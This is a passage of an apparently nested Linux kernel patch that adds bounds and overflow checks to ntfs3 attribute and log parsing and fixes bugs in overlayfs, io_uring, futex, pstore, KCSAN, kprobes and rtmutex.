++		if (roff > le32_to_cpu(attr->size)) {
++			err = -EINVAL;
++			break;
++		}
++
+ 		err = run_unpack(&run, sbi, ni->mi.rno, svcn, evcn, svcn,
+ 				 Add2Ptr(attr, roff),
+ 				 le32_to_cpu(attr->size) - roff);
+@@ -1589,6 +1595,9 @@ int ni_delete_all(struct ntfs_inode *ni)
+ 		asize = le32_to_cpu(attr->size);
+ 		roff = le16_to_cpu(attr->nres.run_off);
+ 
++		if (roff > asize)
++			return -EINVAL;
++
+ 		/* run==1 means unpack and deallocate. */
+ 		run_unpack_ex(RUN_DEALLOCATE, sbi, ni->mi.rno, svcn, evcn, svcn,
+ 			      Add2Ptr(attr, roff), asize - roff);
+@@ -2291,6 +2300,11 @@ remove_wof:
+ 		asize = le32_to_cpu(attr->size);
+ 		roff = le16_to_cpu(attr->nres.run_off);
+ 
++		if (roff > asize) {
++			err = -EINVAL;
++			goto out;
++		}
++
+ 		/*run==1  Means unpack and deallocate. */
+ 		run_unpack_ex(RUN_DEALLOCATE, sbi, ni->mi.rno, svcn, evcn, svcn,
+ 			      Add2Ptr(attr, roff), asize - roff);
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index 0d611a6c5511f..c662d2a519072 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -1132,7 +1132,7 @@ static int read_log_page(struct ntfs_log *log, u32 vbo,
+ 		return -EINVAL;
+ 
+ 	if (!*buffer) {
+-		to_free = kmalloc(bytes, GFP_NOFS);
++		to_free = kmalloc(log->page_size, GFP_NOFS);
+ 		if (!to_free)
+ 			return -ENOMEM;
+ 		*buffer = to_free;
+@@ -1180,10 +1180,7 @@ static int log_read_rst(struct ntfs_log *log, u32 l_size, bool first,
+ 			struct restart_info *info)
+ {
+ 	u32 skip, vbo;
+-	struct RESTART_HDR *r_page = kmalloc(DefaultLogPageSize, GFP_NOFS);
+-
+-	if (!r_page)
+-		return -ENOMEM;
++	struct RESTART_HDR *r_page = NULL;
+ 
+ 	/* Determine which restart area we are looking for. */
+ 	if (first) {
+@@ -1197,7 +1194,6 @@ static int log_read_rst(struct ntfs_log *log, u32 l_size, bool first,
+ 	/* Loop continuously until we succeed. */
+ 	for (; vbo < l_size; vbo = 2 * vbo + skip, skip = 0) {
+ 		bool usa_error;
+-		u32 sys_page_size;
+ 		bool brst, bchk;
+ 		struct RESTART_AREA *ra;
+ 
+@@ -1251,24 +1247,6 @@ static int log_read_rst(struct ntfs_log *log, u32 l_size, bool first,
+ 			goto check_result;
+ 		}
+ 
+-		/* Read the entire restart area. */
+-		sys_page_size = le32_to_cpu(r_page->sys_page_size);
+-		if (DefaultLogPageSize != sys_page_size) {
+-			kfree(r_page);
+-			r_page = kzalloc(sys_page_size, GFP_NOFS);
+-			if (!r_page)
+-				return -ENOMEM;
+-
+-			if (read_log_page(log, vbo,
+-					  (struct RECORD_PAGE_HDR **)&r_page,
+-					  &usa_error)) {
+-				/* Ignore any errors. */
+-				kfree(r_page);
+-				r_page = NULL;
+-				continue;
+-			}
+-		}
+-
+ 		if (is_client_area_valid(r_page, usa_error)) {
+ 			info->valid_page = true;
+ 			ra = Add2Ptr(r_page, le16_to_cpu(r_page->ra_off));
+@@ -2727,6 +2705,9 @@ static inline bool check_attr(const struct MFT_REC *rec,
+ 			return false;
+ 		}
+ 
++		if (run_off > asize)
++			return false;
++
+ 		if (run_unpack(NULL, sbi, 0, svcn, evcn, svcn,
+ 			       Add2Ptr(attr, run_off), asize - run_off) < 0) {
+ 			return false;
+@@ -4771,6 +4752,12 @@ fake_attr:
+ 		u16 roff = le16_to_cpu(attr->nres.run_off);
+ 		CLST svcn = le64_to_cpu(attr->nres.svcn);
+ 
++		if (roff > t32) {
++			kfree(oa->attr);
++			oa->attr = NULL;
++			goto fake_attr;
++		}
++
+ 		err = run_unpack(&oa->run0, sbi, inode->i_ino, svcn,
+ 				 le64_to_cpu(attr->nres.evcn), svcn,
+ 				 Add2Ptr(attr, roff), t32 - roff);
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 4ed15f64b17f6..b6e22bcb929ba 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -1849,9 +1849,10 @@ int ntfs_security_init(struct ntfs_sb_info *sbi)
+ 		goto out;
+ 	}
+ 
+-	root_sdh = resident_data(attr);
++	root_sdh = resident_data_ex(attr, sizeof(struct INDEX_ROOT));
+ 	if (root_sdh->type != ATTR_ZERO ||
+-	    root_sdh->rule != NTFS_COLLATION_TYPE_SECURITY_HASH) {
++	    root_sdh->rule != NTFS_COLLATION_TYPE_SECURITY_HASH ||
++	    offsetof(struct INDEX_ROOT, ihdr) + root_sdh->ihdr.used > attr->res.data_size) {
+ 		err = -EINVAL;
+ 		goto out;
+ 	}
+@@ -1867,9 +1868,10 @@ int ntfs_security_init(struct ntfs_sb_info *sbi)
+ 		goto out;
+ 	}
+ 
+-	root_sii = resident_data(attr);
++	root_sii = resident_data_ex(attr, sizeof(struct INDEX_ROOT));
+ 	if (root_sii->type != ATTR_ZERO ||
+-	    root_sii->rule != NTFS_COLLATION_TYPE_UINT) {
++	    root_sii->rule != NTFS_COLLATION_TYPE_UINT ||
++	    offsetof(struct INDEX_ROOT, ihdr) + root_sii->ihdr.used > attr->res.data_size) {
+ 		err = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 440328147e7e3..c27b4fe575136 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -1017,6 +1017,12 @@ ok:
+ 		err = 0;
+ 	}
+ 
++	/* check for index header length */
++	if (offsetof(struct INDEX_BUFFER, ihdr) + ib->ihdr.used > bytes) {
++		err = -EINVAL;
++		goto out;
++	}
++
+ 	in->index = ib;
+ 	*node = in;
+ 
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index d5a3afbbbfd8c..e352aa37330cd 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -129,6 +129,9 @@ next_attr:
+ 	rsize = attr->non_res ? 0 : le32_to_cpu(attr->res.data_size);
+ 	asize = le32_to_cpu(attr->size);
+ 
++	if (le16_to_cpu(attr->name_off) + attr->name_len > asize)
++		goto out;
++
+ 	switch (attr->type) {
+ 	case ATTR_STD:
+ 		if (attr->non_res ||
+@@ -364,7 +367,13 @@ next_attr:
+ attr_unpack_run:
+ 	roff = le16_to_cpu(attr->nres.run_off);
+ 
++	if (roff > asize) {
++		err = -EINVAL;
++		goto out;
++	}
++
+ 	t64 = le64_to_cpu(attr->nres.svcn);
++
+ 	err = run_unpack_ex(run, sbi, ino, t64, le64_to_cpu(attr->nres.evcn),
+ 			    t64, Add2Ptr(attr, roff), asize - roff);
+ 	if (err < 0)
+diff --git a/fs/ntfs3/record.c b/fs/ntfs3/record.c
+index 7d2fac5ee2156..af1e4b364ea8e 100644
+--- a/fs/ntfs3/record.c
++++ b/fs/ntfs3/record.c
+@@ -220,6 +220,11 @@ struct ATTRIB *mi_enum_attr(struct mft_inode *mi, struct ATTRIB *attr)
+ 			return NULL;
+ 		}
+ 
++		if (off + asize < off) {
++			/* overflow check */
++			return NULL;
++		}
++
+ 		attr = Add2Ptr(attr, asize);
+ 		off += asize;
+ 	}
+@@ -260,6 +265,11 @@ struct ATTRIB *mi_enum_attr(struct mft_inode *mi, struct ATTRIB *attr)
+ 		if (t16 + t32 > asize)
+ 			return NULL;
+ 
++		if (attr->name_len &&
++		    le16_to_cpu(attr->name_off) + sizeof(short) * attr->name_len > t16) {
++			return NULL;
++		}
++
+ 		return attr;
+ 	}
+ 
+diff --git a/fs/ntfs3/super.c b/fs/ntfs3/super.c
+index adc4f73722b7c..8e2fe0f69203b 100644
+--- a/fs/ntfs3/super.c
++++ b/fs/ntfs3/super.c
+@@ -789,7 +789,7 @@ static int ntfs_init_from_boot(struct super_block *sb, u32 sector_size,
+ 						 : (u32)boot->record_size
+ 							   << sbi->cluster_bits;
+ 
+-	if (record_size > MAXIMUM_BYTES_PER_MFT)
++	if (record_size > MAXIMUM_BYTES_PER_MFT || record_size < SECTOR_SIZE)
+ 		goto out;
+ 
+ 	sbi->record_bits = blksize_bits(record_size);
+@@ -1141,7 +1141,7 @@ static int ntfs_fill_super(struct super_block *sb, struct fs_context *fc)
+ 		goto put_inode_out;
+ 	}
+ 	bytes = inode->i_size;
+-	sbi->def_table = t = kmalloc(bytes, GFP_NOFS);
++	sbi->def_table = t = kmalloc(bytes, GFP_NOFS | __GFP_NOWARN);
+ 	if (!t) {
+ 		err = -ENOMEM;
+ 		goto put_inode_out;
+@@ -1260,9 +1260,9 @@ load_root:
+ 	ref.low = cpu_to_le32(MFT_REC_ROOT);
+ 	ref.seq = cpu_to_le16(MFT_REC_ROOT);
+ 	inode = ntfs_iget5(sb, &ref, &NAME_ROOT);
+-	if (IS_ERR(inode)) {
++	if (IS_ERR(inode) || !inode->i_op) {
+ 		ntfs_err(sb, "Failed to load root.");
+-		err = PTR_ERR(inode);
++		err = IS_ERR(inode) ? PTR_ERR(inode) : -EINVAL;
+ 		goto out;
+ 	}
+ 
+@@ -1281,6 +1281,7 @@ out:
+ 	 * Free resources here.
+ 	 * ntfs_fs_free will be called with fc->s_fs_info = NULL
+ 	 */
++	put_mount_options(sbi->options);
+ 	put_ntfs(sbi);
+ 	sb->s_fs_info = NULL;
+ 
+diff --git a/fs/overlayfs/dir.c b/fs/overlayfs/dir.c
+index 6b03457f72bb1..c3032cef391ef 100644
+--- a/fs/overlayfs/dir.c
++++ b/fs/overlayfs/dir.c
+@@ -592,28 +592,42 @@ static int ovl_create_or_link(struct dentry *dentry, struct inode *inode,
+ 			goto out_revert_creds;
+ 	}
+ 
+-	err = -ENOMEM;
+-	override_cred = prepare_creds();
+-	if (override_cred) {
++	if (!attr->hardlink) {
++		err = -ENOMEM;
++		override_cred = prepare_creds();
++		if (!override_cred)
++			goto out_revert_creds;
++		/*
++		 * In the creation cases(create, mkdir, mknod, symlink),
++		 * ovl should transfer current's fs{u,g}id to underlying
++		 * fs. Because underlying fs want to initialize its new
++		 * inode owner using current's fs{u,g}id. And in this
++		 * case, the @inode is a new inode that is initialized
++		 * in inode_init_owner() to current's fs{u,g}id. So use
++		 * the inode's i_{u,g}id to override the cred's fs{u,g}id.
++		 *
++		 * But in the other hardlink case, ovl_link() does not
++		 * create a new inode, so just use the ovl mounter's
++		 * fs{u,g}id.
++		 */
+ 		override_cred->fsuid = inode->i_uid;
+ 		override_cred->fsgid = inode->i_gid;
+-		if (!attr->hardlink) {
+-			err = security_dentry_create_files_as(dentry,
+-					attr->mode, &dentry->d_name, old_cred,
+-					override_cred);
+-			if (err) {
+-				put_cred(override_cred);
+-				goto out_revert_creds;
+-			}
++		err = security_dentry_create_files_as(dentry,
++				attr->mode, &dentry->d_name, old_cred,
++				override_cred);
++		if (err) {
++			put_cred(override_cred);
++			goto out_revert_creds;
+ 		}
+ 		put_cred(override_creds(override_cred));
+ 		put_cred(override_cred);
+-
+-		if (!ovl_dentry_is_whiteout(dentry))
+-			err = ovl_create_upper(dentry, inode, attr);
+-		else
+-			err = ovl_create_over_whiteout(dentry, inode, attr);
+ 	}
++
++	if (!ovl_dentry_is_whiteout(dentry))
++		err = ovl_create_upper(dentry, inode, attr);
++	else
++		err = ovl_create_over_whiteout(dentry, inode, attr);
++
+ out_revert_creds:
+ 	revert_creds(old_cred);
+ 	return err;
+diff --git a/fs/overlayfs/file.c b/fs/overlayfs/file.c
+index d066be3b9226e..6011f955436ba 100644
+--- a/fs/overlayfs/file.c
++++ b/fs/overlayfs/file.c
+@@ -96,6 +96,7 @@ static int ovl_change_flags(struct file *file, unsigned int flags)
+ 
+ 	spin_lock(&file->f_lock);
+ 	file->f_flags = (file->f_flags & ~OVL_SETFL_MASK) | flags;
++	file->f_iocb_flags = iocb_flags(file);
+ 	spin_unlock(&file->f_lock);
+ 
+ 	return 0;
+diff --git a/fs/pnode.c b/fs/pnode.c
+index 1106137c747a3..468e4e65a615d 100644
+--- a/fs/pnode.c
++++ b/fs/pnode.c
+@@ -244,7 +244,7 @@ static int propagate_one(struct mount *m)
+ 		}
+ 		do {
+ 			struct mount *parent = last_source->mnt_parent;
+-			if (last_source == first_source)
++			if (peers(last_source, first_source))
+ 				break;
+ 			done = parent->mnt_master == p;
+ 			if (done && peers(n, parent))
+diff --git a/fs/pstore/ram.c b/fs/pstore/ram.c
+index 74e4d93f3e08d..f3fa3625d772c 100644
+--- a/fs/pstore/ram.c
++++ b/fs/pstore/ram.c
+@@ -670,7 +670,7 @@ static int ramoops_parse_dt(struct platform_device *pdev,
+ 		field = value;						\
+ 	}
+ 
+-	parse_u32("mem-type", pdata->record_size, pdata->mem_type);
++	parse_u32("mem-type", pdata->mem_type, pdata->mem_type);
+ 	parse_u32("record-size", pdata->record_size, 0);
+ 	parse_u32("console-size", pdata->console_size, 0);
+ 	parse_u32("ftrace-size", pdata->ftrace_size, 0);
+diff --git a/fs/pstore/zone.c b/fs/pstore/zone.c
+index 017d0d4ad3295..2770746bb7aa1 100644
+--- a/fs/pstore/zone.c
++++ b/fs/pstore/zone.c
+@@ -761,7 +761,7 @@ static inline int notrace psz_kmsg_write_record(struct psz_context *cxt,
+ 		/* avoid destroying old data, allocate a new one */
+ 		len = zone->buffer_size + sizeof(*zone->buffer);
+ 		zone->oldbuf = zone->buffer;
+-		zone->buffer = kzalloc(len, GFP_KERNEL);
++		zone->buffer = kzalloc(len, GFP_ATOMIC);
+ 		if (!zone->buffer) {
+ 			zone->buffer = zone->oldbuf;
+ 			return -ENOMEM;
+diff --git a/include/linux/eventfd.h b/include/linux/eventfd.h
+index 3cd202d3eefb3..36a486505b081 100644
+--- a/include/linux/eventfd.h
++++ b/include/linux/eventfd.h
+@@ -40,6 +40,7 @@ struct file *eventfd_fget(int fd);
+ struct eventfd_ctx *eventfd_ctx_fdget(int fd);
+ struct eventfd_ctx *eventfd_ctx_fileget(struct file *file);
+ __u64 eventfd_signal(struct eventfd_ctx *ctx, __u64 n);
++__u64 eventfd_signal_mask(struct eventfd_ctx *ctx, __u64 n, unsigned mask);
+ int eventfd_ctx_remove_wait_queue(struct eventfd_ctx *ctx, wait_queue_entry_t *wait,
+ 				  __u64 *cnt);
+ void eventfd_ctx_do_read(struct eventfd_ctx *ctx, __u64 *cnt);
+@@ -66,6 +67,12 @@ static inline int eventfd_signal(struct eventfd_ctx *ctx, __u64 n)
+ 	return -ENOSYS;
+ }
+ 
++static inline int eventfd_signal_mask(struct eventfd_ctx *ctx, __u64 n,
++				      unsigned mask)
++{
++	return -ENOSYS;
++}
++
+ static inline void eventfd_ctx_put(struct eventfd_ctx *ctx)
+ {
+ 
+diff --git a/include/linux/nvme.h b/include/linux/nvme.h
+index 050d7d0cd81b0..d9fbc5afeaf72 100644
+--- a/include/linux/nvme.h
++++ b/include/linux/nvme.h
+@@ -7,6 +7,7 @@
+ #ifndef _LINUX_NVME_H
+ #define _LINUX_NVME_H
+ 
++#include <linux/bits.h>
+ #include <linux/types.h>
+ #include <linux/uuid.h>
+ 
+@@ -639,7 +640,7 @@ enum {
+ 	NVME_CMD_EFFECTS_NCC		= 1 << 2,
+ 	NVME_CMD_EFFECTS_NIC		= 1 << 3,
+ 	NVME_CMD_EFFECTS_CCC		= 1 << 4,
+-	NVME_CMD_EFFECTS_CSE_MASK	= 3 << 16,
++	NVME_CMD_EFFECTS_CSE_MASK	= GENMASK(18, 16),
+ 	NVME_CMD_EFFECTS_UUID_SEL	= 1 << 19,
+ };
+ 
+diff --git a/include/uapi/linux/eventpoll.h b/include/uapi/linux/eventpoll.h
+index 8a3432d0f0dcb..e687658843b1c 100644
+--- a/include/uapi/linux/eventpoll.h
++++ b/include/uapi/linux/eventpoll.h
+@@ -41,6 +41,12 @@
+ #define EPOLLMSG	(__force __poll_t)0x00000400
+ #define EPOLLRDHUP	(__force __poll_t)0x00002000
+ 
++/*
++ * Internal flag - wakeup generated by io_uring, used to detect recursion back
++ * into the io_uring poll handler.
++ */
++#define EPOLL_URING_WAKE	((__force __poll_t)(1U << 27))
++
+ /* Set exclusive wakeup mode for the target file descriptor */
+ #define EPOLLEXCLUSIVE	((__force __poll_t)(1U << 28))
+ 
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 17771cb3c3330..71f1cabb9f3d4 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -495,7 +495,7 @@ static void io_eventfd_ops(struct rcu_head *rcu)
+ 	int ops = atomic_xchg(&ev_fd->ops, 0);
+ 
+ 	if (ops & BIT(IO_EVENTFD_OP_SIGNAL_BIT))
+-		eventfd_signal(ev_fd->cq_ev_fd, 1);
++		eventfd_signal_mask(ev_fd->cq_ev_fd, 1, EPOLL_URING_WAKE);
+ 
+ 	/* IO_EVENTFD_OP_FREE_BIT may not be set here depending on callback
+ 	 * ordering in a race but if references are 0 we know we have to free
+@@ -531,7 +531,7 @@ static void io_eventfd_signal(struct io_ring_ctx *ctx)
+ 		goto out;
+ 
+ 	if (likely(eventfd_signal_allowed())) {
+-		eventfd_signal(ev_fd->cq_ev_fd, 1);
++		eventfd_signal_mask(ev_fd->cq_ev_fd, 1, EPOLL_URING_WAKE);
+ 	} else {
+ 		atomic_inc(&ev_fd->refs);
+ 		if (!atomic_fetch_or(BIT(IO_EVENTFD_OP_SIGNAL_BIT), &ev_fd->ops))
+diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
+index 50bc3af449534..4334cd30c423d 100644
+--- a/io_uring/io_uring.h
++++ b/io_uring/io_uring.h
+@@ -4,6 +4,7 @@
+ #include <linux/errno.h>
+ #include <linux/lockdep.h>
+ #include <linux/io_uring_types.h>
++#include <uapi/linux/eventpoll.h>
+ #include "io-wq.h"
+ #include "slist.h"
+ #include "filetable.h"
+@@ -207,12 +208,18 @@ static inline void io_commit_cqring(struct io_ring_ctx *ctx)
+ static inline void __io_cqring_wake(struct io_ring_ctx *ctx)
+ {
+ 	/*
+-	 * wake_up_all() may seem excessive, but io_wake_function() and
+-	 * io_should_wake() handle the termination of the loop and only
+-	 * wake as many waiters as we need to.
++	 * Trigger waitqueue handler on all waiters on our waitqueue. This
++	 * won't necessarily wake up all the tasks, io_should_wake() will make
++	 * that decision.
++	 *
++	 * Pass in EPOLLIN|EPOLL_URING_WAKE as the poll wakeup key. The latter
++	 * set in the mask so that if we recurse back into our own poll
++	 * waitqueue handlers, we know we have a dependency between eventfd or
++	 * epoll and should terminate multishot poll at that point.
+ 	 */
+ 	if (waitqueue_active(&ctx->cq_wait))
+-		wake_up_all(&ctx->cq_wait);
++		__wake_up(&ctx->cq_wait, TASK_NORMAL, 0,
++				poll_to_key(EPOLL_URING_WAKE | EPOLLIN));
+ }
+ 
+ static inline void io_cqring_wake(struct io_ring_ctx *ctx)
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index d9bf1767867e6..fded1445a803b 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -429,6 +429,14 @@ static int io_poll_wake(struct wait_queue_entry *wait, unsigned mode, int sync,
+ 		return 0;
+ 
+ 	if (io_poll_get_ownership(req)) {
++		/*
++		 * If we trigger a multishot poll off our own wakeup path,
++		 * disable multishot as there is a circular dependency between
++		 * CQ posting and triggering the event.
++		 */
++		if (mask & EPOLL_URING_WAKE)
++			poll->events |= EPOLLONESHOT;
++
+ 		/* optional, saves extra locking for removal in tw handler */
+ 		if (mask && poll->events & EPOLLONESHOT) {
+ 			list_del_init(&poll->wait.entry);
+diff --git a/kernel/futex/syscalls.c b/kernel/futex/syscalls.c
+index 086a22d1adb78..a8074079b09e8 100644
+--- a/kernel/futex/syscalls.c
++++ b/kernel/futex/syscalls.c
+@@ -286,19 +286,22 @@ SYSCALL_DEFINE5(futex_waitv, struct futex_waitv __user *, waiters,
+ 	}
+ 
+ 	futexv = kcalloc(nr_futexes, sizeof(*futexv), GFP_KERNEL);
+-	if (!futexv)
+-		return -ENOMEM;
++	if (!futexv) {
++		ret = -ENOMEM;
++		goto destroy_timer;
++	}
+ 
+ 	ret = futex_parse_waitv(futexv, waiters, nr_futexes);
+ 	if (!ret)
+ 		ret = futex_wait_multiple(futexv, nr_futexes, timeout ? &to : NULL);
+ 
++	kfree(futexv);
++
++destroy_timer:
+ 	if (timeout) {
+ 		hrtimer_cancel(&to.timer);
+ 		destroy_hrtimer_on_stack(&to.timer);
+ 	}
+-
+-	kfree(futexv);
+ 	return ret;
+ }
+ 
+diff --git a/kernel/kcsan/core.c b/kernel/kcsan/core.c
+index fe12dfe254ecf..54d077e1a2dc7 100644
+--- a/kernel/kcsan/core.c
++++ b/kernel/kcsan/core.c
+@@ -14,10 +14,12 @@
+ #include <linux/init.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
++#include <linux/minmax.h>
+ #include <linux/moduleparam.h>
+ #include <linux/percpu.h>
+ #include <linux/preempt.h>
+ #include <linux/sched.h>
++#include <linux/string.h>
+ #include <linux/uaccess.h>
+ 
+ #include "encoding.h"
+@@ -1308,3 +1310,51 @@ noinline void __tsan_atomic_signal_fence(int memorder)
+ 	}
+ }
+ EXPORT_SYMBOL(__tsan_atomic_signal_fence);
++
++#ifdef __HAVE_ARCH_MEMSET
++void *__tsan_memset(void *s, int c, size_t count);
++noinline void *__tsan_memset(void *s, int c, size_t count)
++{
++	/*
++	 * Instead of not setting up watchpoints where accessed size is greater
++	 * than MAX_ENCODABLE_SIZE, truncate checked size to MAX_ENCODABLE_SIZE.
++	 */
++	size_t check_len = min_t(size_t, count, MAX_ENCODABLE_SIZE);
++
++	check_access(s, check_len, KCSAN_ACCESS_WRITE, _RET_IP_);
++	return memset(s, c, count);
++}
++#else
++void *__tsan_memset(void *s, int c, size_t count) __alias(memset);
++#endif
++EXPORT_SYMBOL(__tsan_memset);
++
++#ifdef __HAVE_ARCH_MEMMOVE
++void *__tsan_memmove(void *dst, const void *src, size_t len);
++noinline void *__tsan_memmove(void *dst, const void *src, size_t len)
++{
++	size_t check_len = min_t(size_t, len, MAX_ENCODABLE_SIZE);
++
++	check_access(dst, check_len, KCSAN_ACCESS_WRITE, _RET_IP_);
++	check_access(src, check_len, 0, _RET_IP_);
++	return memmove(dst, src, len);
++}
++#else
++void *__tsan_memmove(void *dst, const void *src, size_t len) __alias(memmove);
++#endif
++EXPORT_SYMBOL(__tsan_memmove);
++
++#ifdef __HAVE_ARCH_MEMCPY
++void *__tsan_memcpy(void *dst, const void *src, size_t len);
++noinline void *__tsan_memcpy(void *dst, const void *src, size_t len)
++{
++	size_t check_len = min_t(size_t, len, MAX_ENCODABLE_SIZE);
++
++	check_access(dst, check_len, KCSAN_ACCESS_WRITE, _RET_IP_);
++	check_access(src, check_len, 0, _RET_IP_);
++	return memcpy(dst, src, len);
++}
++#else
++void *__tsan_memcpy(void *dst, const void *src, size_t len) __alias(memcpy);
++#endif
++EXPORT_SYMBOL(__tsan_memcpy);
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index a35074f0daa1a..1c18ecf9f98b1 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -2213,13 +2213,9 @@ int register_kretprobe(struct kretprobe *rp)
+ 	rp->kp.post_handler = NULL;
+ 
+ 	/* Pre-allocate memory for max kretprobe instances */
+-	if (rp->maxactive <= 0) {
+-#ifdef CONFIG_PREEMPTION
++	if (rp->maxactive <= 0)
+ 		rp->maxactive = max_t(unsigned int, 10, 2*num_possible_cpus());
+-#else
+-		rp->maxactive = num_possible_cpus();
+-#endif
+-	}
++
+ #ifdef CONFIG_KRETPROBE_ON_RETHOOK
+ 	rp->rh = rethook_alloc((void *)rp, kretprobe_rethook_handler);
+ 	if (!rp->rh)
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 7779ee8abc2a0..010cf4e6d0b8f 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -89,15 +89,31 @@ static inline int __ww_mutex_check_kill(struct rt_mutex *lock,
+  * set this bit before looking at the lock.
+  */
+ 
+-static __always_inline void
+-rt_mutex_set_owner(struct rt_mutex_base *lock, struct task_struct *owner)
++static __always_inline struct task_struct *
++rt_mutex_owner_encode(struct rt_mutex_base *lock, struct task_struct *owner)
+ {
+ 	unsigned long val = (unsigned long)owner;
+ 
+ 	if (rt_mutex_has_waiters(lock))
+ 		val |= RT_MUTEX_HAS_WAITERS;
+ 
+-	WRITE_ONCE(lock->owner, (struct task_struct *)val);
++	return (struct task_struct *)val;
++}
++
++static __always_inline void
++rt_mutex_set_owner(struct rt_mutex_base *lock, struct task_struct *owner)
++{
++	/*
++	 * lock->wait_lock is held but explicit acquire semantics are needed
++	 * for a new lock owner so WRITE_ONCE is insufficient.
++	 */
++	xchg_acquire(&lock->owner, rt_mutex_owner_encode(lock, owner));
++}
++
++static __always_inline void rt_mutex_clear_owner(struct rt_mutex_base *lock)
++{
++	/* lock->wait_lock is held so the unlock provides release semantics. */
++	WRITE_ONCE(lock->owner, rt_mutex_owner_encode(lock, NULL));
+ }
+ 
+ static __always_inline void clear_rt_mutex_waiters(struct rt_mutex_base *lock)
+@@ -106,7 +122,8 @@ static __always_inline void clear_rt_mutex_waiters(struct rt_mutex_base *lock)
+ 			((unsigned long)lock->owner & ~RT_MUTEX_HAS_WAITERS);
+ }
+ 
+-static __always_inline void fixup_rt_mutex_waiters(struct rt_mutex_base *lock)
++static __always_inline void
++fixup_rt_mutex_waiters(struct rt_mutex_base *lock, bool acquire_lock)
+ {
+ 	unsigned long owner, *p = (unsigned long *) &lock->owner;
+ 
+@@ -172,8 +189,21 @@ static __always_inline void fixup_rt_mutex_waiters(struct rt_mutex_base *lock)
+ 	 * still set.
+ 	 */
+ 	owner = READ_ONCE(*p);
+-	if (owner & RT_MUTEX_HAS_WAITERS)
+-		WRITE_ONCE(*p, owner & ~RT_MUTEX_HAS_WAITERS);
++	if (owner & RT_MUTEX_HAS_WAITERS) {
++		/*
++		 * See rt_mutex_set_owner() and rt_mutex_clear_owner() on
++		 * why xchg_acquire() is used for updating owner for
++		 * locking and WRITE_ONCE() for unlocking.
++		 *
++		 * WRITE_ONCE() would work for the acquire case too, but
++		 * in case that the lock acquisition failed it might
++		 * force other lockers into the slow path unnecessarily.
++		 */
++		if (acquire_lock)
++			xchg_acquire(p, owner & ~RT_MUTEX_HAS_WAITERS);
++		else
++			WRITE_ONCE(*p, owner & ~RT_MUTEX_HAS_WAITERS);
++	}
+ }
+ 
+ /*
+@@ -208,6 +238,13 @@ static __always_inline void mark_rt_mutex_waiters(struct rt_mutex_base *lock)
+ 		owner = *p;
+ 	} while (cmpxchg_relaxed(p, owner,
+ 				 owner | RT_MUTEX_HAS_WAITERS) != owner);
++
++	/*
++	 * The cmpxchg loop above is relaxed to avoid back-to-back ACQUIRE
++	 * operations in the event of contention. Ensure the successful
++	 * cmpxchg is visible.
++	 */
++	smp_mb__after_atomic();
+ }
+ 
+ /*
+@@ -1243,7 +1280,7 @@ static int __sched __rt_mutex_slowtrylock(struct rt_mutex_base *lock)
+ 	 * try_to_take_rt_mutex() sets the lock waiters bit
+ 	 * unconditionally. Clean this up.
+ 	 */
+-	fixup_rt_mutex_waiters(lock);
++	fixup_rt_mutex_waiters(lock, true);
+ 
+ 	return ret;
+ }
+@@ -1604,7 +1641,7 @@ static int __sched __rt_mutex_slowlock(struct rt_mutex_base *lock,
+ 	 * try_to_take_rt_mutex() sets the waiter bit
+ 	 * unconditionally. We might have to fix that up.
+ 	 */
+-	fixup_rt_mutex_waiters(lock);
++	fixup_rt_mutex_waiters(lock, true);
+ 
+ 	trace_contention_end(lock, ret);
+ 
+@@ -1719,7 +1756,7 @@ static void __sched rtlock_slowlock_locked(struct rt_mutex_base *lock)
+ 	 * try_to_take_rt_mutex() sets the waiter bit unconditionally.
+ 	 * We might have to fix that up:
+ 	 */
+-	fixup_rt_mutex_waiters(lock);
++	fixup_rt_mutex_waiters(lock, true);
+ 	debug_rt_mutex_free_waiter(&waiter);
+ 
+ 	trace_contention_end(lock, 0);
+diff --git a/kernel/locking/rtmutex_api.c b/kernel/locking/rtmutex_api.c
+index 900220941caac..cb9fdff76a8a3 100644
+--- a/kernel/locking/rtmutex_api.c
++++ b/kernel/locking/rtmutex_api.c
+@@ -267,7 +267,7 @@ void __sched rt_mutex_init_proxy_locked(struct rt_mutex_base *lock,
+ void __sched rt_mutex_proxy_unlock(struct rt_mutex_base *lock)
+ {
+ 	debug_rt_mutex_proxy_unlock(lock);
+-	rt_mutex_set_owner(lock, NULL);
++	rt_mutex_clear_owner(lock);
+ }
+ 
+ /**
+@@ -382,7 +382,7 @@ int __sched rt_mutex_wait_proxy_lock(struct rt_mutex_base *lock,
+ 	 * try_to_take_rt_mutex() sets the waiter bit unconditionally. We might
+ 	 * have to fix that up.
+ 	 */
+-	fixup_rt_mutex_waiters(lock);
++	fixup_rt_mutex_waiters(lock, true);
+ 	raw_spin_unlock_irq(&lock->wait_lock);
+ 
+ 	return ret;
+@@ -438,7 +438,7 @@ bool __sched rt_mutex_cleanup_proxy_lock(struct rt_mutex_base *lock,
+ 	 * try_to_take_rt_mutex() sets the waiter bit unconditionally. We might
+ 	 * have to fix that up.
+ 	 */
+-	fixup_rt_mutex_waiters(lock);
++	fixup_rt_mutex_waiters(lock, false);
+ 
+ 	raw_spin_unlock_irq(&lock->wait_lock);
+ 
+diff --git a/mm/compaction.c b/mm/compaction.c
+index 1f6da31dd9a50..ca1603524bbe0 100644
+--- a/mm/compaction.c
++++ b/mm/compaction.c
